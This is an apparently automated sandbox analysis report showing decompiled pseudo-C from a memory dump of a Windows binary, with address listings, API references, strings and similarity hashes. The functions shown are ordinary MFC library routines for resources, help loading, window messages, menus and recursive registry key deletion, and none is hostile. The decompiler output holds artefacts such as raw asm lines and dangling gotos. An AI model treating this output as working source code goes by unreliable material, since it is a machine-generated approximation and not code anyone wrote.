				_t19 =  *_t2;
				_t7 = LoadResource(_t15, _t19);
				if(_t7 != 0) {
					_t21 = LockResource(_t7);
					if(_t21 == 0) {
						L8:
						return 0;
					} else {
						_t11 = SizeofResource(_t15, _t19) + _t21;
						_t17 = _a12 & 0x0000000f;
						if(_t17 <= 0) {
							L7:
							if(_t21 < _t11) {
								asm("sbb eax, eax");
								return  ~( *_t21) & _t21;
							} else {
								goto L8;
							}
						} else {
							while(_t21 < _t11) {
								_t17 = _t17 - 1;
								_t21 = _t21 + 2 + ( *_t21 & 0x0000ffff) * 2;
								if(_t17 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L10;
							}
							goto L8;
						}
					}
				} else {
					return _t7;
				}
				L10:
			}

0x004022a1
0x004022a6
0x004022a6
0x004022ac
0x004022b4
0x004022c1
0x004022c5
0x004022f4
0x004022f9
0x004022c7
0x004022d3
0x004022d5
0x004022d8
0x004022f0
0x004022f2
0x00402300
0x00402307
0x00000000
0x00000000
0x00000000
0x004022e0
0x004022e0
0x004022e4
0x004022ea
0x004022ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004022ee
0x00000000
0x004022e0
0x004022d8
0x004022b8
0x004022b8
0x004022b8
0x00000000

APIs

LoadResource.KERNEL32(?,=%[v,=%[v,?,004021BE,=%[v,00000000,=%[v,?,00401F5F,00000000,00000000,00000000,?,00000000,?), ref: 004022AC
LockResource.KERNEL32(00000000,=%[v,?,00401F5F,00000000,00000000,00000000,?,00000000,?,?,0043B8E8,000000FF,00414BC2,?,00000008), ref: 004022BB
SizeofResource.KERNEL32(?,=%[v,?,00401F5F,00000000,00000000,00000000,?,00000000,?,?,0043B8E8,000000FF,00414BC2,?,00000008), ref: 004022C9

Strings

=%[v, xrefs: 004022A6, 004022AA, 004022C7
=%[v, xrefs: 004022A5, 004022B9

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$LoadLockSizeof
String ID: =%[v$=%[v
API String ID: 2853612939-2632413613
Opcode ID: 34e80785091c770ec0bfab3ea831be55da9a5463210ac46c32e6ff8e92ce17e2
Instruction ID: 967949a709c244177ccf063dad989dbdadb1d15a80403a5f7985de654c2d74c0
Opcode Fuzzy Hash: 34e80785091c770ec0bfab3ea831be55da9a5463210ac46c32e6ff8e92ce17e2
Instruction Fuzzy Hash: BCF0A93760012157CB20ABB9ED88997B798FBC176670404BFFA51E3291D774D840B664

Uniqueness

Uniqueness Score: -1.00%

Function 00411F5B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00411F5B(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E004209A7(__ebp, 0xc);
				_push(E00411402);
				_t26 = E00416E02(__ebx, 0x452658, __edi, _t25, _t28);
				if(_t26 == 0) {
					E00415838(0x452658);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E00420A14(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E0040FA4C(_t21, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x00411f5b
0x00411f5b
0x00411f5b
0x00411f5e
0x00411f63
0x00411f72
0x00411f76
0x00411f78
0x00411f78
0x00411f7d
0x00411f81
0x00411fbb
0x00411fbd
0x00000000
0x00411f83
0x00411f83
0x00411f88
0x00411f90
0x00411f93
0x00411f9f
0x00411fa5
0x00411fa7
0x00411faa
0x00000000
0x00000000
0x00411faf
0x00411fb5
0x00411fb5
0x00000000
0x00411f95

APIs

Part of subcall function 004209A7: EnterCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004209E3
Part of subcall function 004209A7: InitializeCriticalSection.KERNEL32(=%[v,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004209F2
Part of subcall function 004209A7: LeaveCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004209FF
Part of subcall function 004209A7: EnterCriticalSection.KERNEL32(=%[v,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00420A0B

Part of subcall function 00416E02: __EH_prolog3_catch.LIBCMT ref: 00416E09

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00411F9F
FreeLibrary.KERNEL32(?), ref: 00411FAF

Strings

X&E, xrefs: 00411F68
HtmlHelpA, xrefs: 00411F99
hhctrl.ocx, xrefs: 00411F83

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$X&E$hhctrl.ocx
API String ID: 3274081130-2799760243
Opcode ID: 9931ed1567fb8e466eb4ac25affe73acbefa34ca0a2b8cffc0c23a918aacd61a
Instruction ID: bc1770ff51e577bcc3fbb050918fbab37f6289e5dab745d7ba0f8e963837a8ed
Opcode Fuzzy Hash: 9931ed1567fb8e466eb4ac25affe73acbefa34ca0a2b8cffc0c23a918aacd61a
Instruction Fuzzy Hash: E901FE31105302DFDB206F61ED0AF9776E0AF14715F00882FF186914B1D738C891862E

Uniqueness

Uniqueness Score: -1.00%

Function 004115CB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004115CB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t29;

				_push(4);
				E004271DA(E0043A190, __ebx, __edi, __esi);
				_t28 = __ecx;
				 *((intOrPtr*)(_t29 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43e26c;
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && __ecx != 0x4524f8 && __ecx != 0x452550 && __ecx != 0x4525a8 && __ecx != 0x452600) {
					E00411081(__ebx, __ecx, _t25, __edi, __ecx);
				}
				_t23 =  *((intOrPtr*)(_t28 + 0x4c));
				if(_t23 != 0) {
					 *((intOrPtr*)( *_t23 + 4))(1);
				}
				_t15 =  *((intOrPtr*)(_t28 + 0x50));
				if(_t15 != 0 &&  *(_t15 + 0x28) == _t28) {
					 *(_t15 + 0x28) =  *(_t15 + 0x28) & 0x00000000;
				}
				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
				return E004272B2(E0040CD77(_t28));
			}

0x004115cb
0x004115d2
0x004115d7
0x004115d9
0x004115dc
0x004115e2
0x004115ea
0x0041160c
0x0041160c
0x00411611
0x00411616
0x0041161c
0x0041161c
0x0041161f
0x00411624
0x0041162b
0x0041162b
0x0041162f
0x0041163f

APIs

__EH_prolog3.LIBCMT ref: 004115D2

Strings

lC, xrefs: 00411604
P%E, xrefs: 004115F4
lC, xrefs: 004115FC
lC, xrefs: 004115EC

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: P%E$lC$lC$lC
API String ID: 431132790-3095559173
Opcode ID: 95f65ef72e2657b1868895f137b0d29f262bcf1023fba1ba3324b38e5cdf0e99
Instruction ID: aa42cf33f234935dbb20f1adc16bd2de27ac9fd01f81d223179ade2d48ce1ce4
Opcode Fuzzy Hash: 95f65ef72e2657b1868895f137b0d29f262bcf1023fba1ba3324b38e5cdf0e99
Instruction Fuzzy Hash: 78F0A970E00614CBCB34AB2985497AE72A06F44315F09416FD695573F1D7BD8CD4CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00418FB0, Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00418FB0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E004271DA(E0043A9BC, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x419170) & 0x000000ff) * 4 +  &M00419148))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E0041965D( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E004151D0();
							__ecx = __ebp + 0xc;
							__eax = E00401FA0(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E00402160(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E00414208(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E0041425C(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E004182F4( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E00418E77(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E004151D0();
							__ecx = __ebp + 0xc;
							__eax = E00401FA0(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E004113EB(__ebx, __ebp + 0xc, __edx, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E00401E60( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E004272B2(_t56);
			}

0x00418fb0
0x00418fb7
0x00418fc1
0x00418fca
0x0041913d
0x0041913d
0x00418fd0
0x00418fd7
0x00000000
0x00418ffd
0x00419000
0x00419005
0x00000000
0x00000000
0x00418fde
0x00418fe1
0x00000000
0x00000000
0x004190b1
0x004190b4
0x004190b7
0x004190bc
0x004190c1
0x004190c3
0x004190c5
0x00000000
0x00000000
0x00418ff3
0x00418ff6
0x00418fe6
0x00418fe6
0x00000000
0x00000000
0x00419119
0x0041911f
0x00419122
0x0041912c
0x0041912f
0x00419136
0x00000000
0x00000000
0x004190ce
0x004190d1
0x004190d6
0x004190dc
0x00000000
0x00000000
0x0041900d
0x00419011
0x00419013
0x00419016
0x00419019
0x0041902f
0x00419041
0x00419044
0x0041904a
0x0041904d
0x00419050
0x00419050
0x00419055
0x0041905b
0x0041905e
0x00419063
0x0041906a
0x00419065
0x00419065
0x00419065
0x0041906d
0x00000000
0x00000000
0x00419075
0x00419079
0x00419095
0x00419095
0x00419098
0x0041909d
0x004190a0
0x004190a2
0x004190a3
0x004190a6
0x004190a9
0x00000000
0x0041907b
0x0041907b
0x0041907e
0x00419084
0x00419086
0x0041908b
0x0041908f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041908f
0x00000000
0x00000000
0x004190e4
0x004190ea
0x004190ed
0x004190f2
0x004190f2
0x004190f2
0x004190f6
0x004190f6
0x004190f9
0x004190fc
0x00419101
0x00419106
0x00419109
0x0041910c
0x0041910f
0x00418feb
0x00418fed
0x00000000
0x00000000
0x00000000
0x00000000
0x00418fd7
0x0041913f
0x00419144

APIs

__EH_prolog3.LIBCMT ref: 00418FB7
SendMessageA.USER32(?,00000138,?,?), ref: 0041902F
GetBkColor.GDI32(?), ref: 00419038
GetTextColor.GDI32(?), ref: 00419044
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 004190D6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 6f2c8bfaad31ccb83de2a076c2cb7fa4b8b9ef0c93403cbecc00751135611f5d
Instruction ID: 976757ffee2d5a3670a5faa552d76543763fb3bf02de6dc557011058f8e27ddd
Opcode Fuzzy Hash: 6f2c8bfaad31ccb83de2a076c2cb7fa4b8b9ef0c93403cbecc00751135611f5d
Instruction Fuzzy Hash: 3F417F7050070ADFCB109F65C8589DE77B0FF08314F11855EF896AB3A1DB78A992CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401210, Relevance: 7.6, APIs: 5, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00401210(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				struct HMENU__** _t35;
				intOrPtr* _t39;
				void* _t45;
				void* _t48;
				void* _t60;
				struct HMENU__* _t62;
				void* _t66;
				CHAR* _t69;
				void* _t71;
				void* _t74;
				signed int _t76;
				void* _t78;
				struct HMENU__** _t80;

				_t78 = __eflags;
				_push(0xffffffff);
				_push(E0043B988);
				_push( *[fs:0x0]);
				_push(_t48);
				_push(_t45);
				_push(_t66);
				_t24 =  *0x44f5d0; // 0x765b253d
				_push(_t24 ^ _t76);
				 *[fs:0x0] = _t76 + 0x18;
				_t71 = _t48;
				E0040C486(_t45, _t48, _t66);
				_push(GetSystemMenu( *(_t71 + 0x20), 0));
				_t74 = E0040E7CD(_t45, _t60, _t66, _t71, _t78);
				if(_t74 != 0) {
					_t35 = E004151D0();
					_t80 = _t35;
					_t54 = 0 | _t80 == 0x00000000;
					if(_t80 == 0) {
						_push(0x80004005);
						_t35 = E00401D00(_t45, _t54, _t66, _t71, _t74);
					}
					_t62 =  *_t35;
					_t6 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0xc))))() + 0x10; // 0x10
					_t69 = _t6;
					 *(_t76 + 0x14) = _t69;
					_push(0x65);
					 *(_t76 + 0x24) = 0;
					if(E0040E8CF() != 0) {
						L00402190(_t45, _t76 + 0x1c, _t74, _t38, 0x65);
						_t69 =  *(_t76 + 0x14);
					}
					if( *((intOrPtr*)(_t69 - 0xc)) != 0) {
						AppendMenuA( *(_t74 + 4), 0x800, 0, 0);
						_t62 =  *(_t74 + 4);
						AppendMenuA(_t62, 0, 0x10, _t69);
					}
					_t14 = _t69 - 0x10; // 0x0
					_t39 = _t14;
					 *((intOrPtr*)(_t76 + 0x20)) = 0xffffffff;
					asm("lock xadd [ecx], edx");
					if((_t62 | 0xffffffff) - 1 <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t39)) + 4))))(_t39);
					}
				}
				SendMessageA( *(_t71 + 0x20), 0x80, 1,  *(_t71 + 0x74));
				SendMessageA( *(_t71 + 0x20), 0x80, 0,  *(_t71 + 0x74));
				 *[fs:0x0] =  *((intOrPtr*)(_t76 + 0x18));
				return 1;
			}

0x00401210
0x00401210
0x00401212
0x0040121d
0x0040121e
0x0040121f
0x00401222
0x00401223
0x0040122a
0x0040122f
0x00401235
0x00401237
0x00401248
0x0040124e
0x00401252
0x00401258
0x0040125f
0x00401261
0x00401266
0x00401268
0x0040126d
0x0040126d
0x00401272
0x0040127b
0x0040127b
0x0040127e
0x00401282
0x00401284
0x00401293
0x0040129c
0x004012a1
0x004012a1
0x004012a9
0x004012be
0x004012c0
0x004012c9
0x004012c9
0x004012cb
0x004012cb
0x004012ce
0x004012dc
0x004012e3
0x004012ed
0x004012ed
0x004012e3
0x00401304
0x00401315
0x00401320
0x0040132f

APIs

GetSystemMenu.USER32(?,00000000,765B253D,?,?,?,?,?,?,0043B988,000000FF), ref: 00401242
AppendMenuA.USER32 ref: 004012BE
AppendMenuA.USER32 ref: 004012C9
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401304
SendMessageA.USER32(?,00000080,00000000,?), ref: 00401315

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$AppendMessageSend$System
String ID:
API String ID: 62300227-0
Opcode ID: e2e2f21b7d31a8a46bd0ff38669d3c0be8cba821ac252d01998c9ac9d2c2e9bd
Instruction ID: be0c2a081e90a1eefdcb775bca3028feebb7a72e45825bfc1279280e3ee9bfe8
Opcode Fuzzy Hash: e2e2f21b7d31a8a46bd0ff38669d3c0be8cba821ac252d01998c9ac9d2c2e9bd
Instruction Fuzzy Hash: B6317075240701AFE314DB65DC45F67B3E9FB88710F108A2EF655AB2E0DB79E8048B68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE1, Relevance: 7.6, APIs: 5, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00414AE1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t42;
				long _t45;
				long _t52;
				void* _t64;
				void* _t68;
				void* _t72;
				void* _t74;
				void* _t78;

				_t72 = __edx;
				_t59 = __ebx;
				_push(8);
				E004271DA(E0043A492, __ebx, __edi, __esi);
				_t74 = __ecx;
				 *(_t78 - 0x14) = 0;
				if(( *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L9:
					E00401EE0(_t59, _t78,  *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x74)) + 0x1c)));
				} else {
					E00401FA0(_t78 - 0x10, E004151D0());
					 *(_t78 - 4) = 0;
					_t42 = E00401D50(_t78 - 0x10, 0x104);
					_t59 = GetParent;
					 *(_t78 - 0x14) = _t42;
					_t45 = SendMessageA( *(E00410E42(GetParent, _t78, GetParent( *(_t74 + 0x20))) + 0x20), 0x464, 0x104,  *(_t78 - 0x14));
					_t64 = _t78 - 0x10;
					if(_t45 >= 0) {
						E0040D723(GetParent, _t64, _t74, _t78, 0xffffffff);
					} else {
						E00402100(_t64);
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t78 - 0x10)) - 0xc)) == 0) {
						L8:
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E00401E60( *((intOrPtr*)(_t78 - 0x10)) + 0xfffffff0, _t72);
						goto L9;
					} else {
						 *(_t78 - 0x14) = E00401D50(_t78 - 0x10, 0x104);
						_t52 = SendMessageA( *(E00410E42(_t59, _t78, GetParent( *(_t74 + 0x20))) + 0x20), 0x465, 0x104,  *(_t78 - 0x14));
						_t68 = _t78 - 0x10;
						if(_t52 >= 0) {
							E0040D723(_t59, _t68, _t74, _t78, 0xffffffff);
							E00405440( *((intOrPtr*)(_t78 + 8)), __eflags, _t78 - 0x10);
							E00401E60( *((intOrPtr*)(_t78 - 0x10)) + 0xfffffff0, _t72);
						} else {
							E00402100(_t68);
							goto L8;
						}
					}
				}
				return E004272B2( *((intOrPtr*)(_t78 + 8)));
			}

0x00414ae1
0x00414ae1
0x00414ae1
0x00414ae8
0x00414aed
0x00414afb
0x00414afe
0x00414bb4
0x00414bbd
0x00414b0d
0x00414b16
0x00414b1b
0x00414b27
0x00414b2f
0x00414b35
0x00414b4c
0x00414b54
0x00414b57
0x00414b62
0x00414b59
0x00414b59
0x00414b59
0x00414b6e
0x00414ba5
0x00414ba8
0x00414baf
0x00000000
0x00414b70
0x00414b7c
0x00414b93
0x00414b9b
0x00414b9e
0x00414bcf
0x00414bdb
0x00414be6
0x00414ba0
0x00414ba0
0x00000000
0x00414ba0
0x00414b9e
0x00414b6e
0x00414bca

APIs

__EH_prolog3.LIBCMT ref: 00414AE8
GetParent.USER32(?), ref: 00414B38
SendMessageA.USER32(?,00000464,00000104,?), ref: 00414B4C
GetParent.USER32(?), ref: 00414B7F
SendMessageA.USER32(?,00000465,00000104,?), ref: 00414B93

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageParentSend$H_prolog3
String ID:
API String ID: 1482283565-0
Opcode ID: 2211d8f9d8ff79b42f5bdfe452ea4d4cb020e02a9e9dee4a07ccbd1af5b41bcd
Instruction ID: 3a1bbd03de1dc19efc4dfeace99694c1fd80ee446ee2c3e315459b0a2db6c67e
Opcode Fuzzy Hash: 2211d8f9d8ff79b42f5bdfe452ea4d4cb020e02a9e9dee4a07ccbd1af5b41bcd
Instruction Fuzzy Hash: BD318E71D00229ABCB05EFA2CC45EEEB774BF44358B10422EF521771E1DB78A950CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7F3, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040D7F3(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x44f5d0; // 0x765b253d
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E0042720D(E00439B5D, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						E00401EE0(_t42, _t59, _t59);
						 *(_t59 - 4) = 1;
						_t57 = E0040D7F3(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E00401E60( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E0042569C(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

0x0040d7f3
0x0040d7fa
0x0040d7fe
0x0040d805
0x0040d80b
0x0040d812
0x0040d817
0x0040d81f
0x0040d825
0x0040d82b
0x0040d82e
0x0040d831
0x0040d837
0x0040d83b
0x0040d841
0x0040d84f
0x0040d855
0x0040d857
0x0040d859
0x00000000
0x00000000
0x0040d85b
0x0040d865
0x0040d871
0x0040d87d
0x0040d881
0x0040d887
0x0040d88b
0x0040d892
0x0040d894
0x00000000
0x0040d894
0x00000000
0x0040d892
0x0040d8b5
0x0040d8bb
0x0040d8c5
0x0040d8d0
0x0040d8bd
0x0040d8bd
0x0040d8c3
0x00000000
0x00000000
0x0040d8c3
0x0040d8d5
0x0040d8d5
